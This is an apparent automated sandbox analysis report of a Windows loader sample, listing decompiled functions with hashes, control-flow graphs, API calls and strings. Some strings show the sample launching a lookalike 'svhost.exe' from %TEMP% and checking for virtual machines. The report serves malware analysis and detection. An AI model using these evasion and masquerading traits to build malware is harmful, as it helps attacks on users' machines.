                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                                                  • API String ID: 544645111-395989641
                                                                                                                                                                  • Opcode ID: 8cab94366e6b1b099be5090a741e6956bf18a2ff2f360fa7a3443ac310753d32
                                                                                                                                                                  • Instruction ID: c65ba656f3e0e1fa8ac4f62300e1d393468feefeeb3680ddb040f854185ed496
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cab94366e6b1b099be5090a741e6956bf18a2ff2f360fa7a3443ac310753d32
                                                                                                                                                                  • Instruction Fuzzy Hash: BE9188B1B1024056EB249F76D88071F6B59A7947AAF548837CF09B77D5CE3ECA82830D
                                                                                                                                                                  Function 00401730 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 342 401730-401777 344 401779-40178a puts 342->344 345 40178f-4017d3 342->345 346 40184c-401854 344->346 349 4017d5-4017ed printf 345->349 350 4017ef-4017f6 345->350 349->346 351 4017f9 call 401677 350->351 352 4017fe-401800 351->352 353 401802-401824 printf call 401e9e 352->353 354 401826-401837 printf 352->354 356 40183c-40184a 353->356 354->356 356->350
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: printfputs
                                                                                                                                                                  • String ID: %TEMP%$%s is running.$%s not found. Skipping launch.$%s not running. Starting...$%s\%s$svhost.exe
                                                                                                                                                                  • API String ID: 3793801724-2704161499
                                                                                                                                                                  • Opcode ID: de50e54462b1b5d347b5b87bc864536f09ca71b799e4cf3f7a6df0b898b65601
                                                                                                                                                                  • Instruction ID: a5489c6963390d0c640a0e435bf09691d47060695afb22ddfe453e79fc2f7c30
                                                                                                                                                                  • Opcode Fuzzy Hash: de50e54462b1b5d347b5b87bc864536f09ca71b799e4cf3f7a6df0b898b65601
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B210AB5351A4595EB20EB62EC943E92365E794788F810037CF0E6B7A4EF7CC655C348
                                                                                                                                                                  Function 00403830 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 359 403830-40384b 360 403910-403914 359->360 361 403851-403856 359->361 360->361 364 40391a-403924 360->364 362 4038c0-4038c5 361->362 363 403858-40385d 361->363 367 403980-403990 signal 362->367 368 4038cb 362->368 365 4038db-4038eb signal 363->365 366 40385f-403864 363->366 369 4039d0-4039e4 signal call 4030b0 365->369 370 4038f1-4038f4 365->370 366->364 372 40386a 366->372 367->370 371 403996-4039aa signal 367->371 373 403925-40392a 368->373 374 4038cd-4038d2 368->374 369->364 376 4038a1-4038ab 370->376 377 4038f6-4038fd 370->377 378 403902-403907 371->378 379 403870-403875 372->379 380 403964-403969 372->380 373->364 382 40392c-403931 373->382 374->364 375 4038d4-4038d9 374->375 375->365 375->376 386 4039c1-4039c3 376->386 387 4038b1-4038b8 376->387 377->378 379->364 385 40387b-403880 379->385 383 403937-403947 signal 380->383 384 40396b-403970 380->384 382->376 382->383 392 403a00-403a12 signal 383->392 393 40394d-403950 383->393 384->376 389 403976 384->389 385->376 391 403882-403892 signal 385->391 386->378 387->362 389->364 394 403898-40389b 391->394 395 4039e9-4039fb signal 391->395 392->378 393->376 396 403956-403962 393->396 394->376 397 4039b0-4039bc 394->397 395->378 396->378 397->378
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: signal
                                                                                                                                                                  • String ID: CCG
                                                                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                                                                  • Opcode ID: 2be471abf36b6d8511b2256a92b77f3601ae47d48cc5d9b98e98cc4c4400e4b4
                                                                                                                                                                  • Instruction ID: 3b915e5e6a9bc8df1f710355430a1c215bf775a2e62912b46c024491e7803df1
                                                                                                                                                                  • Opcode Fuzzy Hash: 2be471abf36b6d8511b2256a92b77f3601ae47d48cc5d9b98e98cc4c4400e4b4
                                                                                                                                                                  • Instruction Fuzzy Hash: F43181E170150046FE786A7944553360C496BC933AF29CA3BEA6DB73D2CDBC8EC1122E
                                                                                                                                                                  Function 004030E0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 156COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,?,?,?,004070C8,?,?,004070C8,004033D2,0040A610,00007FFE2167ADA0,?,?,?,00000001), ref: 0040318B
                                                                                                                                                                  Strings
                                                                                                                                                                  • VirtualProtect failed with code 0x%x, xrefs: 0040326A
                                                                                                                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 004032B8
                                                                                                                                                                  • Address %p has no image-section, xrefs: 004032C9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryVirtual
                                                                                                                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                  • API String ID: 1804819252-2123141913
                                                                                                                                                                  • Opcode ID: 9c57dac23c483cc4d857320043402fb79bf7a79e36c6cfd7f1dc33e7f70dcb75
                                                                                                                                                                  • Instruction ID: 8c231c32730a40bc13f921d250129705830e11279a8bba98ea914987c5d32c44
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c57dac23c483cc4d857320043402fb79bf7a79e36c6cfd7f1dc33e7f70dcb75
                                                                                                                                                                  • Instruction Fuzzy Hash: BA51B3B3701B4086DB118F26EC407597BA5F789BA9F088626DF59277D4DB3CC646C708
                                                                                                                                                                  Function 00401AED Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Device may be virtual., xrefs: 00401B22
                                                                                                                                                                  • Program started in virtual machine., xrefs: 00401AFE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: exitputs
                                                                                                                                                                  • String ID: Device may be virtual.$Program started in virtual machine.
                                                                                                                                                                  • API String ID: 3126681908-2466117216
                                                                                                                                                                  • Opcode ID: 688843aee465fa4b2caf09cd31bc2807d149b93eea2607e079f563f3a68d1312
                                                                                                                                                                  • Instruction ID: 28ff8e205e6b1fc29dc0a525ce5d1480b60f0643d2363600b81d42351452ebe2
                                                                                                                                                                  • Opcode Fuzzy Hash: 688843aee465fa4b2caf09cd31bc2807d149b93eea2607e079f563f3a68d1312
                                                                                                                                                                  • Instruction Fuzzy Hash: 98E04F7161000099F300B772E81B3AD262157E4308F44447BAB097F2E2DE7CCA95866D
                                                                                                                                                                  Function 00402CB0 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 00402CF5
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00402D00
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00402D09
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402D11
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32 ref: 00402D1E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1445889803-0
                                                                                                                                                                  • Opcode ID: 9101069884a8374435b55088dc69beb5d46b46d3a1c6f9f53c2dd12352552ff0
                                                                                                                                                                  • Instruction ID: 3d40a7e008acd1dc58858779c40122e5c62eac1c9c50c61d529e2d738f8c795a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9101069884a8374435b55088dc69beb5d46b46d3a1c6f9f53c2dd12352552ff0
                                                                                                                                                                  • Instruction Fuzzy Hash: ED118CA6616B1185FB204B25FC0831A7360FB48BB4F4806319F9C137E4EB3CC986C748
                                                                                                                                                                  Function 004042B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00404208), ref: 00404261
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,00404208), ref: 00404271
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                  • String ID: msvcrt.dll$vsprintf_s
                                                                                                                                                                  • API String ID: 1646373207-1988861753
                                                                                                                                                                  • Opcode ID: 076cd3444b54e977fd44761c6c4abc5188683b7a0d55046c4dc39cdd10debb49
                                                                                                                                                                  • Instruction ID: 4733ffafd4fa8c3cd73f3b5a79f206c0752539f87a989e2712d15c03cf9ad1bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 076cd3444b54e977fd44761c6c4abc5188683b7a0d55046c4dc39cdd10debb49
                                                                                                                                                                  • Instruction Fuzzy Hash: 75F03CF1745B0891DE119B41FD1438A6365F788BD4F48852A9F4D27728DA7CC156CB48
                                                                                                                                                                  Function 00402FB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Unknown error, xrefs: 004030A0
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                                                                  • Opcode ID: 0e5a1a1676b68bc66412fdda574edf97328a4d88b57948db25a3e8f1c3d9dbcf
                                                                                                                                                                  • Instruction ID: c46fda56a21eff3fef8f5cbc5f98c99a762237a04564c165e8d53360edc5f129
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e5a1a1676b68bc66412fdda574edf97328a4d88b57948db25a3e8f1c3d9dbcf
                                                                                                                                                                  • Instruction Fuzzy Hash: 4301DBB2504E88C2D6128F1CE8013EA73B4FF9D79AF155315EB893A264DB39C653C704
                                                                                                                                                                  Function 00403050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Argument singularity (SIGN), xrefs: 00403050
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                                                                  • Opcode ID: 482e5ac7ed3f8ed191ffad0a4cf176950d09ac2512ade35c916fdd57abc1dab3
                                                                                                                                                                  • Instruction ID: eb499c023530d11a1ec41438c0c2ab257c35d34497dfa0317612a6fe201c2959
                                                                                                                                                                  • Opcode Fuzzy Hash: 482e5ac7ed3f8ed191ffad0a4cf176950d09ac2512ade35c916fdd57abc1dab3
                                                                                                                                                                  • Instruction Fuzzy Hash: A1F09663404F4481D2029F1CA8003AB7370FF9D789F195316EF893A564DF39C5838704
                                                                                                                                                                  Function 00403060 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Overflow range error (OVERFLOW), xrefs: 00403060
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-4064033741
                                                                                                                                                                  • Opcode ID: ed94facb976460f00853b55a9d8f43eeb999889b1f93dc61f92e721771f8a3c8
                                                                                                                                                                  • Instruction ID: 73d87a943b8db449c06d236d93ed0a2d35fab2d2e82e8471f435edb6d4a52a96
                                                                                                                                                                  • Opcode Fuzzy Hash: ed94facb976460f00853b55a9d8f43eeb999889b1f93dc61f92e721771f8a3c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF09663404F4481D2029F1CA8003AB7370FF9D799F195316EF893A564DF39C5879704
                                                                                                                                                                  Function 00403070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • The result is too small to be represented (UNDERFLOW), xrefs: 00403070
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                                                                  • Opcode ID: d289b50dc81c247b09126f47fa71e4fde1800a24d371b97371cee01f1670ee32
                                                                                                                                                                  • Instruction ID: 643ef16f371a5f8b72ee52e7d867f07bfb6aeface7f933900dbae4b4f46b52f7
                                                                                                                                                                  • Opcode Fuzzy Hash: d289b50dc81c247b09126f47fa71e4fde1800a24d371b97371cee01f1670ee32
                                                                                                                                                                  • Instruction Fuzzy Hash: 64F096A2404F4481D2029F1DA8003AB7370FF9D789F195316EF893A574DF38C5838704
                                                                                                                                                                  Function 00403080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  • Total loss of significance (TLOSS), xrefs: 00403080
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                                                                  • Opcode ID: 1c442322ed198adcc404c3aa091c0e682de8475096e9f5aee44da5c64ab50979
                                                                                                                                                                  • Instruction ID: 5803ad06fd81930719d27edf85a4b9c0fe972c5d70108334fd817cbbfb12dd4e
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c442322ed198adcc404c3aa091c0e682de8475096e9f5aee44da5c64ab50979
                                                                                                                                                                  • Instruction Fuzzy Hash: BBF096A2504F4881D6029F1CA8003AB7370FF9D789F195316EF893A564DF38D5838704
                                                                                                                                                                  Function 00403090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  • Partial loss of significance (PLOSS), xrefs: 00403090
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                                                                  • Opcode ID: 60af07fa474c14e1c60bca0c9e59fd1e339dc12809b17dd44b960db232b2f32f
                                                                                                                                                                  • Instruction ID: 3a4b825eb4124d8cc6877290317bd0ab4500e149bc64abcafef6a390fcf4abdb
                                                                                                                                                                  • Opcode Fuzzy Hash: 60af07fa474c14e1c60bca0c9e59fd1e339dc12809b17dd44b960db232b2f32f
                                                                                                                                                                  • Instruction Fuzzy Hash: D3F09663404F4481D2029F1CA8003AB7370FF9D789F195316EF893A564DF38C5839704
                                                                                                                                                                  Function 00402FE1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  • Argument domain error (DOMAIN), xrefs: 00402FE1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                                                                  • Opcode ID: 19f9509d62011d14b053ccca3954fb4e65a1af42faa987aac2694f1ce9213707
                                                                                                                                                                  • Instruction ID: bc1a01331a64b29a46880244e8cc94783991fe0971f42baf4b00ecd47296b570
                                                                                                                                                                  • Opcode Fuzzy Hash: 19f9509d62011d14b053ccca3954fb4e65a1af42faa987aac2694f1ce9213707
